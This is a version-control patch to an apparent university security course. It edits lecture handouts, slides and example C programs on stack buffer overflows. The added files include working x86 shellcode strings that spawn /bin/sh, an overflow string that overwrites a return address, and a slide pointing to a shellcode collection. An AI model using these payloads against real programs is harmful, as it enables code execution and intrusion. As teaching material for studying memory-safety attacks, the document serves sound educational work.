# HG changeset patch # User Christian Urban # Date 1444302490 -3600 # Node ID f05368d007dddbdf0312c397a82d108528512bf4 # Parent 6d552ef3b43544eecc8116f4fbc2390a98d0e371 updated diff -r 6d552ef3b435 -r f05368d007dd handouts/ho03.pdf Binary file handouts/ho03.pdf has changed diff -r 6d552ef3b435 -r f05368d007dd handouts/ho03.tex --- a/handouts/ho03.tex Wed Oct 07 18:03:32 2015 +0100 +++ b/handouts/ho03.tex Thu Oct 08 12:08:10 2015 +0100 @@ -426,20 +426,22 @@ \lstinputlisting[language=C,numbers=none]{../progs/shell.c} -\noindent Once compiled, we can use the debugger to obtain -the machine code, or even the ready-made encoding as character +\noindent Once compiled, we can use the debugger to obtain the +machine code, or even get the ready-made encoding as character sequence. +\lstinputlisting[language=C,numbers=none]{../progs/o2.c} + While not too difficult, obtaining this string is not entirely trivial using \pcode{gdb}. Remember the functions in C that copy or fill buffers work such that they copy everything until the zero byte is reached. Unfortunately the ``vanilla'' output -from the debugger for the shell-program above will contain -such zero bytes. So a post-processing phase is needed to -rewrite the machine code in a way that it does not contain any -zero bytes. This is like some works of literature that have -been written so that the letter e, for example, is avoided. -The technical term for such a literature work is +from the debugger for the shell-program above contains such +zero bytes. So a post-processing phase is needed to rewrite +the machine code in a way that it does not contain any zero +bytes. This is like some works of literature that have been +written so that the letter e, for example, is avoided. The +technical term for such a literature work is \emph{lipogram}.\footnote{The most famous example of a lipogram is a 50,000 words novel titled Gadsby, see \url{https://archive.org/details/Gadsby}, which avoids the @@ -531,7 +533,10 @@ \begin{figure}[p] \lstinputlisting[language=C]{../progs/C3.c} \caption{Overwriting a buffer with a string containing a -payload.\label{C3}} +payload. Lines 14 and 15 write the address of the buffer +into \pcode{large\_string}. The payload is copied in +Lines 17 and 18. Line 20 copies the (too large) string +into the buffer.\label{C3}} \end{figure} By the way you might naw have the question how do attackers @@ -808,6 +813,8 @@ \texttt{n}, the number can be omitted \item \texttt{disassemble fun-name} -- show the assembly code of a function +\item \texttt{info registers} -- prints out the current +content of all registers \item \texttt{run args} -- starts the program, potential arguments can be given \item \texttt{(b)reak line-number} -- sets break point @@ -817,6 +824,7 @@ from address \pcode{addr}, the address could be \code{$esp} for looking at the content of the stack \item \texttt{x/nxb addr} -- prints out \texttt{n} bytes +\item \texttt{q} -- quits the debugger \end{itemize} diff -r 6d552ef3b435 -r f05368d007dd progs/C0.c --- a/progs/C0.c Wed Oct 07 18:03:32 2015 +0100 +++ b/progs/C0.c Thu Oct 08 12:08:10 2015 +0100 @@ -13,7 +13,6 @@ int main (int argc, char **argv) { - foo("my string is too long !!!!!"); - //foo("my string is too long !!!!! \x15\xcd\x5d\x07"); + foo("my string is too long !!!!! "); return 0; } diff -r 6d552ef3b435 -r f05368d007dd progs/C3.c --- a/progs/C3.c Wed Oct 07 18:03:32 2015 +0100 +++ b/progs/C3.c Thu Oct 08 12:08:10 2015 +0100 @@ -3,6 +3,7 @@ "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; + char large_string[128]; void main() { diff -r 6d552ef3b435 -r f05368d007dd progs/README --- a/progs/README Wed Oct 07 18:03:32 2015 +0100 +++ b/progs/README Thu Oct 08 12:08:10 2015 +0100 @@ -23,6 +23,8 @@ Add the bigger string and the long is printed out differently. +foo("my string is too long !!!!! \x15\xcd\x5d\x07"); + C1.c ==== diff -r 6d552ef3b435 -r f05368d007dd progs/args3 --- a/progs/args3 Wed Oct 07 18:03:32 2015 +0100 +++ b/progs/args3 Thu Oct 08 12:08:10 2015 +0100 @@ -5,7 +5,8 @@ # cannot contain any \x00) -shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" +shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62 + \x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" # 24 bytes of shellcode diff -r 6d552ef3b435 -r f05368d007dd progs/o1.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/o1.c Thu Oct 08 12:08:10 2015 +0100 @@ -0,0 +1,5 @@ +char shellcode[] = + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" + "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" + "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" + "\xff\xff/bin/sh"; \ No newline at end of file diff -r 6d552ef3b435 -r f05368d007dd progs/o2.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/o2.c Thu Oct 08 12:08:10 2015 +0100 @@ -0,0 +1,5 @@ +char shellcode[] = + "\x55\x89\xe5\x83\xec\x14\xc7\x45\xf8\xc0\x84\x04" + "\x08\xc7\x45\xfc\x00\x00\x00\x00\x00\x8d\x55\xf8" + "\x89\x54\x24\x04\x89\x04\x34\xe8\x02\xff\xff\xff" + "\xc9\xc3"; diff -r 6d552ef3b435 -r f05368d007dd slides/slides03.pdf Binary file slides/slides03.pdf has changed diff -r 6d552ef3b435 -r f05368d007dd slides/slides03.tex --- a/slides/slides03.tex Wed Oct 07 18:03:32 2015 +0100 +++ b/slides/slides03.tex Thu Oct 08 12:08:10 2015 +0100 @@ -331,7 +331,7 @@ \frametitle{Starting a Shell} \small -\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o1.c} +\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o2.c} \begin{textblock}{7}(5,7.5) \begin{bubble}[7cm] @@ -361,6 +361,24 @@ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +\begin{frame}[t] +\frametitle{String from the Web} + +{\small +\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o1.c}} +\bigskip\bigskip + +\noindent +More ``interesting'' shell programs can be found at + +\begin{center} +\url{http://shellblade.net/shellcode.html} +\end{center} + +\end{frame} +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% + +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \begin{frame}[c] \frametitle{Overflow.c} \mbox{}\\[-10mm]